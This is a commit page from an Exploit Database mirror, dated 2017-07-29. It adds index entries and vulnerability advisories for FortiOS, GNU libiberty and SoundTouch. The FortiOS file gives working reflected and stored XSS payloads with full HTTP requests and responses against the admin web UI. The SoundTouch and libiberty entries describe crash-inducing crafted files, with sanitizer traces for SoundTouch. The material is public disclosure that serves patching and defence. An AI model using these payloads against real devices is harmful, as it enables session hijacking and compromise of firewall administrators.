bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-07-29

Browse source 
6 new exploits

GNU libiberty - Buffer Overflow
SoundTouch 1.9.2 - Multiple Vulnerabilities
LAME 3.99.5 - Multiple Vulnerabilities
libjpeg-turbo 1.5.1 - Denial of Service

Joomla! Component com_ccnewsletter - Directory Traversal
Joomla! Component CCNewsLetter - Directory Traversal

Joomla! Component com_ccnewsletter - Local File Inclusion
Joomla! Component CCNewsLetter - Local File Inclusion
Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection
FortiOS < 5.6.0 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-07-29 05:01:21 +00:00
parent 82b7d150c6
commit fb7bed6364
7 changed files with 778 additions and 2 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
files.csv
View file

@ -5625,6 +5625,10 @@ id,file,description,date,author,platform,type,port
42375,platforms/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",multiple,dos,0 42375,platforms/multiple/dos/42375.html,"WebKit JSC - 'JSArray::appendMemcpy' Uninitialized Memory Copy",2017-07-25,"Google Security Research",multiple,dos,0
42376,platforms/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",multiple,dos,0 42376,platforms/multiple/dos/42376.html,"WebKit JSC - 'ArgumentsEliminationPhase::transform' Incorrect LoadVarargs Handling",2017-07-25,"Google Security Research",multiple,dos,0
42377,platforms/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",multiple,dos,0 42377,platforms/multiple/dos/42377.txt,"WebKit JSC - 'ObjectPatternNode::appendEntry' Stack Use-After-Free",2017-07-25,"Google Security Research",multiple,dos,0
42386,platforms/linux/dos/42386.txt,"GNU libiberty - Buffer Overflow",2017-07-27,"Marcel Böhme",linux,dos,0
42389,platforms/linux/dos/42389.txt,"SoundTouch 1.9.2 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
42390,platforms/linux/dos/42390.txt,"LAME 3.99.5 - Multiple Vulnerabilities",2017-07-28,qflb.wu,linux,dos,0
42391,platforms/linux/dos/42391.txt,"libjpeg-turbo 1.5.1 - Denial of Service",2017-07-28,qflb.wu,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -22872,11 +22876,11 @@ id,file,description,date,author,platform,type,port
11270,platforms/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 11270,platforms/php/webapps/11270.txt,"Joomla! Component VirtueMart Module Customers_who_bought - SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0
11271,platforms/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0 11271,platforms/php/webapps/11271.txt,"Joomla! Component com_virtuemart - order_status_id SQL Injection",2010-01-27,B-HUNT3|2,php,webapps,0
11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0 11274,platforms/php/webapps/11274.pl,"Woltlab Burningboard Addon Kleinanzeigenmarkt - SQL Injection",2009-12-21,fred777,php,webapps,0
11277,platforms/php/webapps/11277.txt,"Joomla! Component com_ccnewsletter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0 11277,platforms/php/webapps/11277.txt,"Joomla! Component CCNewsLetter - Directory Traversal",2010-01-28,B-HUNT3|2,php,webapps,0
11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0 11278,platforms/php/webapps/11278.txt,"Novaboard 1.1.2 - SQL Injection",2010-01-28,Delibey,php,webapps,0
11279,platforms/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11279,platforms/php/webapps/11279.txt,"Joomla! Component com_kunena - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0
11280,platforms/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0 11280,platforms/php/webapps/11280.txt,"Joomla! Component jVideoDirect - Blind SQL Injection",2010-01-28,B-HUNT3|2,php,webapps,0
11282,platforms/php/webapps/11282.txt,"Joomla! Component com_ccnewsletter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0 11282,platforms/php/webapps/11282.txt,"Joomla! Component CCNewsLetter - Local File Inclusion",2010-01-28,AtT4CKxT3rR0r1ST,php,webapps,0
11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0 11284,platforms/php/webapps/11284.txt,"PHP Product Catalog - Cross-Site Request Forgery (Change Administrator Password)",2010-01-29,bi0,php,webapps,0
11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11286,platforms/php/webapps/11286.txt,"Joomla! Component Jreservation - Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0 11287,platforms/php/webapps/11287.txt,"Joomla! Component JE Quiz - 'eid' Parameter Blind SQL Injection",2010-01-29,B-HUNT3|2,php,webapps,0
@ -38186,3 +38190,5 @@ id,file,description,date,author,platform,type,port
42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0 42379,platforms/php/webapps/42379.txt,"Friends in War Make or Break 1.7 - Authentication Bypass",2017-07-25,Adam,php,webapps,0
42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0 42383,platforms/php/webapps/42383.html,"Friends in War Make or Break 1.7 - Cross-Site Request Forgery (Change Admin Password)",2017-07-26,shinnai,php,webapps,0
42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0

Can't render this file because it is too large.

168
platforms/hardware/webapps/42388.txt Executable file
View file

@ -0,0 +1,168 @@
# Title: FortiOS <= 5.6.0 Multiple XSS Vulnerabilities
# Vendor: Fortinet (www.fortinet.com)
# CVE: CVE-2017-3131, CVE-2017-3132, CVE-2017-3133
# Date: 28.07.2016
# Author: Patryk Bogdan (@patryk_bogdan)
Affected FortiNet products:
* CVE-2017-3131 : FortiOS versions 5.4.0 to 5.6.0
* CVE-2017-3132 : FortiOS versions upto 5.6.0
* CVE-2017-3133 : FortiOS versions upto 5.6.0
Fix:
Upgrade to FortiOS version 5.6.1
Video PoC (add admin):
https://youtu.be/fcpLStCD61Q
Vendor advisory:
https://fortiguard.com/psirt/FG-IR-17-104
Vulns:
1. XSS in WEB UI - Applications:
URL:
https://192.168.1.99/ng/fortiview/app/15832" onmouseover=alert('XSS') x="y
Http request:
GET /ng/fortiview/app/15832%22%20onmouseover=alert('XSS')%20x=%22y HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AZxzmYv40KrD1JvCdcctTzmuS+OEd08y+4Vh54tq%2Fap2ej%2F1gJfbaindJ5r4wDXZh%0A4q%2FfgVCdTfMFn+Mr6Xj5Og%3D%3D%0A%26AuthHash%3D9+TbiFXbk+Qkks0pPlkbNDx2L1EA%0A"; ccsrftoken_573485771="5424C6B3842788A23E3413307F1DFFC5"; ccsrftoken="5424C6B3842788A23E3413307F1DFFC5"; VDOM_573485771=root; csrftoken_573485771=da85e919f71a610c45aff174b23c7a10
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 12:07:47 GMT
Server: xxxxxxxx-xxxxx
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Vary: Accept-Encoding
Content-Length: 6150
Connection: close
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-UA-Compatible: IE=Edge
(...)
<span class="fgd-app tooltip id_15832" onmouseover="alert('XSS')" x="y " data-address="undefined" data-dport="443" data-protocol="6"><a href="https://www.fortiguard.com/fos/15832" onclick="return false;" data-hasqtip="2"><span class="app_icon app15832" onmouseover="alert('XSS')" x="y"></span><label class="app_label" title="">15832" onmouseover=alert('XSS') x="y</label></a></span>
(...)
2. XSS in WEB UI - Assign Token:
URL:
https://192.168.1.99/p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cscript%3E
Http request:
GET /p/user/ftoken/activate/user/guest/?action=%3C/script%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E%3Cscript%3E HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Cookie: APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0ALuXSfDjrp0Gel8F8TeKlBgC3kk4P1mhdELHr2Cicb3Zb6hBUnT9ZZnjXC44Dc7bD%0Ae2ymJG%2FgbHFa+4N9AVDIrg%3D%3D%0A%26AuthHash%3DMyJMLA32ueruHIEKia2eb9BWi8oA%0A"; ccsrftoken_573485771="314A25687F6B2075F9413405575D477"; ccsrftoken="314A25687F6B2075F9413405575D477"; VDOM_573485771=root; csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 13:39:17 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 13:39:17 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 13:39:17 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=593eb7ed5cb9704ffa4f388febbd5160; expires=Thu, 22-Mar-2018 13:39:17 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 3485
(...)
<script type="text/javascript">
var ftokens = [];
var action = '</script><script>alert('XSS')</script><script>';
</script>
</head>
(...)
3. Stored XSS in WEB UI - Replacement Messages:
#1 - Http request:
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Content-Length: 125
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
csrfmiddlewaretoken=d58f666c794024295cece8c5b8b6a3ff&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert('XSS')%3C%2Fscript%3E%0A
#1 - Http response:
HTTP/1.1 302 FOUND
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
X-UA-Compatible: IE=Edge
Set-Cookie: EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D; Path=/
Location: https://192.168.1.99/p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 0
#2 - Http request:
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1
Host: 192.168.1.99
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Referer: https://192.168.1.99/p/system/replacemsg/edit/sslvpn/sslvpn-login/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: d58f666c794024295cece8c5b8b6a3ff
X-Requested-With: XMLHttpRequest
Cookie: guest_user_group_21232f297a57a5a743894a0e4a801fc3=; APSCOOKIE_573485771="Era%3D1%26Payload%3DA+atTWBwvFhsVyeZCawBjqawVjqToqqb7RtR7z65XQ1XA+FMbnMTjrQVL5M9SMja%0A5+K56lAZIAEoAPgLmHWvggOu4zlndadoAHR%2FOT7Jn3D35m6HugqQgMfMqs8JfWd9%0AYLFfh9FU2cKvm+hvxa8SbqbuwSnhEdeYV7CatzaScTAAOryJNdjQjDTLke8gJLfS%0A8Zx7lNyNxQr6xJIaKg5lpA%3D%3D%0A%26AuthHash%3D5NI4JPbIioX2ZJvxtEOGAOJ7q5UA%0A"; ccsrftoken_573485771="592068D7C2B5BDB7A91833DB6A512C14"; ccsrftoken="592068D7C2B5BDB7A91833DB6A512C14"; VDOM_573485771=root; csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; EDIT_HISTORY_573485771=%5B%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%2C%7B%22path%22%3A%22system.replacemsg%22%2C%22name%22%3A%22sslvpn%22%2C%22mkey%22%3A%22sslvpn-login%22%7D%5D
DNT: 1
Connection: close
#2 - Http response:
HTTP/1.1 200 OK
Date: Thu, 23 Mar 2017 15:36:33 GMT
Server: xxxxxxxx-xxxxx
Content-Security-Policy: frame-ancestors 'self'
Expires: Thu, 23 Mar 2017 15:36:33 GMT
Vary: Cookie,Accept-Encoding
Last-Modified: Thu, 23 Mar 2017 15:36:33 GMT
X-UA-Compatible: IE=Edge
Cache-Control: max-age=0
X-FRAME-OPTIONS: SAMEORIGIN
Set-Cookie: csrftoken_573485771=d58f666c794024295cece8c5b8b6a3ff; expires=Thu, 22-Mar-2018 15:36:33 GMT; Max-Age=31449600; Path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70940
(...)
<form id="replacemsg_form">
<div style='display:none'><input type='hidden' name='csrfmiddlewaretoken' value='d58f666c794024295cece8c5b8b6a3ff' /></div> <textarea id="buffer" name="buffer">ABC</textarea>
<script>alert('XSS')</script>
</textarea>
(...)

16
platforms/linux/dos/42386.txt Executable file
View file

@ -0,0 +1,16 @@
Source: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69687
The attached program binary causes a buffer overflow in cplus-dem.c when it tries to demangle specially crafted function arguments in the binary. Both the buffer size as well as the buffer content are controlled from the binary.
objdump -x -C <file>
nm -C <file>
Tested on the following configurations
* 2.6.32-573.7.1.el6.x86_64 #1 SMP Tue Sep 22 22:00:00 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* 4.1.12-boot2docker #1 SMP Tue Nov 3 06:03:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
* Binutils versions: 2.20 and 2.26
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42386.zip

210
platforms/linux/dos/42389.txt Executable file
View file

@ -0,0 +1,210 @@
SoundTouch multiple vulnerabilities
================
Author : qflb.wu
===============
Introduction:
=============
SoundTouch is an open-source audio processing library for changing the Tempo, Pitch and Playback Rates of audio streams or audio files. The library additionally supports estimating stable beats-per-minute rates for audio tracks.
Affected version:
=====
1.9.2
Vulnerability Description:
==========================
1.
the TDStretch::processSamples function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(infinite loop and CPU consumption) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_infinite_loop.wav out
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9258
2.
the TDStretch::acceptNewOverlapLength function in source/SoundTouch/TDStretch.cpp in SoundTouch 1.9.2 can cause a denial of service(memory allocation error and application crash) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_memory_allocation_error.wav out
==87485==ERROR: AddressSanitizer failed to allocate 0x16103e000 (5922611200) bytes of LargeMmapAllocator: 12
==87485==Process memory map follows:
0x000000400000-0x0000004c7000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006c7000-0x0000006c8000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006c8000-0x0000006ca000/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch
0x0000006ca000-0x000001b0e000
0x00007fff7000-0x00008fff7000
0x00008fff7000-0x02008fff7000
0x02008fff7000-0x10007fff8000
0x600000000000-0x603000000000
0x603000000000-0x603000010000
0x603000010000-0x604000000000
0x604000000000-0x604000010000
0x604000010000-0x608000000000
0x608000000000-0x608000010000
0x608000010000-0x60b000000000
0x60b000000000-0x60b000010000
0x60b000010000-0x60e000000000
0x60e000000000-0x60e000010000
0x60e000010000-0x611000000000
0x611000000000-0x611000010000
0x611000010000-0x615000000000
0x615000000000-0x615000020000
0x615000020000-0x616000000000
0x616000000000-0x616000020000
0x616000020000-0x619000000000
0x619000000000-0x619000020000
0x619000020000-0x61e000000000
0x61e000000000-0x61e000020000
0x61e000020000-0x621000000000
0x621000000000-0x621000020000
0x621000020000-0x624000000000
0x624000000000-0x624000020000
0x624000020000-0x640000000000
0x640000000000-0x640000003000
0x7fdf6b253000-0x7fdf6d756000
0x7fdf6d756000-0x7fdf6d914000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6d914000-0x7fdf6db13000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db13000-0x7fdf6db17000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db17000-0x7fdf6db19000/lib/x86_64-linux-gnu/libc-2.19.so
0x7fdf6db19000-0x7fdf6db1e000
0x7fdf6db1e000-0x7fdf6db34000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6db34000-0x7fdf6dd33000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6dd33000-0x7fdf6dd34000/lib/x86_64-linux-gnu/libgcc_s.so.1
0x7fdf6dd34000-0x7fdf6de1a000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6de1a000-0x7fdf6e019000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e019000-0x7fdf6e021000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e021000-0x7fdf6e023000/usr/lib/x86_64-linux-gnu/libstdc++.so.6.0.19
0x7fdf6e023000-0x7fdf6e038000
0x7fdf6e038000-0x7fdf6e03b000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e03b000-0x7fdf6e23a000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23a000-0x7fdf6e23b000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23b000-0x7fdf6e23c000/lib/x86_64-linux-gnu/libdl-2.19.so
0x7fdf6e23c000-0x7fdf6e243000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e243000-0x7fdf6e442000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e442000-0x7fdf6e443000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e443000-0x7fdf6e444000/lib/x86_64-linux-gnu/librt-2.19.so
0x7fdf6e444000-0x7fdf6e45d000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e45d000-0x7fdf6e65c000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65c000-0x7fdf6e65d000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65d000-0x7fdf6e65e000/lib/x86_64-linux-gnu/libpthread-2.19.so
0x7fdf6e65e000-0x7fdf6e662000
0x7fdf6e662000-0x7fdf6e767000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e767000-0x7fdf6e966000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e966000-0x7fdf6e967000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e967000-0x7fdf6e968000/lib/x86_64-linux-gnu/libm-2.19.so
0x7fdf6e968000-0x7fdf6e9bd000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6e9bd000-0x7fdf6ebbd000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebbd000-0x7fdf6ebbe000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebbe000-0x7fdf6ebc1000/usr/local/lib/libSoundTouch.so.1.0.0
0x7fdf6ebc1000-0x7fdf6ebe4000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6edb1000-0x7fdf6edc8000
0x7fdf6edca000-0x7fdf6edd7000
0x7fdf6edda000-0x7fdf6ede3000
0x7fdf6ede3000-0x7fdf6ede4000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6ede4000-0x7fdf6ede5000/lib/x86_64-linux-gnu/ld-2.19.so
0x7fdf6ede5000-0x7fdf6ede6000
0x7ffcb0503000-0x7ffcb0524000[stack]
0x7ffcb05a4000-0x7ffcb05a6000[vvar]
0x7ffcb05a6000-0x7ffcb05a8000[vdso]
0xffffffffff600000-0xffffffffff601000[vsyscall]
==87485==End of process memory map.
==87485==AddressSanitizer CHECK failed: /build/buildd/llvm-toolchain-3.4-3.4/projects/compiler-rt/lib/sanitizer_common/sanitizer_posix.cc:68 "(("unable to mmap" && 0)) != (0)" (0x0, 0x0)
#0 0x46da6f in __asan::AsanCheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46da6f)
#1 0x4732d1 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x4732d1)
#2 0x477b9e in __sanitizer::MmapOrDie(unsigned long, char const*) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x477b9e)
#3 0x433278 in __sanitizer::LargeMmapAllocator<__asan::AsanMapUnmapCallback>::Allocate(__sanitizer::AllocatorStats*, unsigned long, unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x433278)
#4 0x42f2bb in __asan::Allocate(unsigned long, unsigned long, __sanitizer::StackTrace*, __asan::AllocType, bool) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x42f2bb)
#5 0x46824d in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x46824d)
#6 0x7fdf6e993d8e in soundtouch::TDStretch::acceptNewOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:724
#7 0x7fdf6e993d8e in soundtouch::TDStretch::calculateOverlapLength(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:1008
#8 0x7fdf6e9901f0 in soundtouch::TDStretch::setParameters(int, int, int, int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:158
#9 0x7fdf6e998910 in soundtouch::TDStretch::setChannels(int) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:599
#10 0x47f825 in setup(soundtouch::SoundTouch*, WavInFile const*, RunParameters const*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:127
#11 0x47f825 in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:310
#12 0x7fdf6d777f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#13 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
POC:
SoundTouch_1.9.2_infinite_loop.wav
CVE:
CVE-2017-9259
3.
the TDStretchSSE::calcCrossCorr function in source/SoundTouch/sse_optimized.cpp in SoundTouch 1.9.2 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted wav file.
./soundstretch SoundTouch_1.9.2_heap_buffer_overflow.wav out
==87598==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x625000007110 at pc 0x7f5076e3c3dc bp 0x7ffda7a42e10 sp 0x7ffda7a42e08
READ of size 16 at 0x625000007110 thread T0
#0 0x7f5076e3c3db in soundtouch::TDStretchSSE::calcCrossCorr(float const*, float const*, double&) /home/a/Downloads/soundtouch/source/SoundTouch/sse_optimized.cpp:120:35
#1 0x7f5076e1f0f9 in soundtouch::TDStretch::seekBestOverlapPositionFull(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:305
#2 0x7f5076e1ee2c in soundtouch::TDStretch::seekBestOverlapPosition(float const*) /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:258
#3 0x7f5076e21e88 in soundtouch::TDStretch::processSamples() /home/a/Downloads/soundtouch/source/SoundTouch/TDStretch.cpp:659
#4 0x7f5076e12893 in soundtouch::FIFOSamplePipe::moveSamples(soundtouch::FIFOSamplePipe&) /home/a/Downloads/soundtouch/source/SoundTouch/../../include/FIFOSamplePipe.h:88
#5 0x7f5076e12893 in soundtouch::SoundTouch::putSamples(float const*, unsigned int) /home/a/Downloads/soundtouch/source/SoundTouch/SoundTouch.cpp:334
#6 0x480f5e in process(soundtouch::SoundTouch*, WavInFile*, WavOutFile*) /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:200
#7 0x480f5e in main /home/a/Downloads/soundtouch/source/SoundStretch/main.cpp:314
#8 0x7f5075c00f44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
#9 0x47dbac in _start (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x47dbac)
0x625000007110 is located 0 bytes to the right of 8208-byte region [0x625000005100,0x625000007110)
allocated by thread T0 here:
#0 0x468209 in operator new[](unsigned long) (/home/a/Downloads/soundtouch/source/SoundStretch/.libs/soundstretch+0x468209)
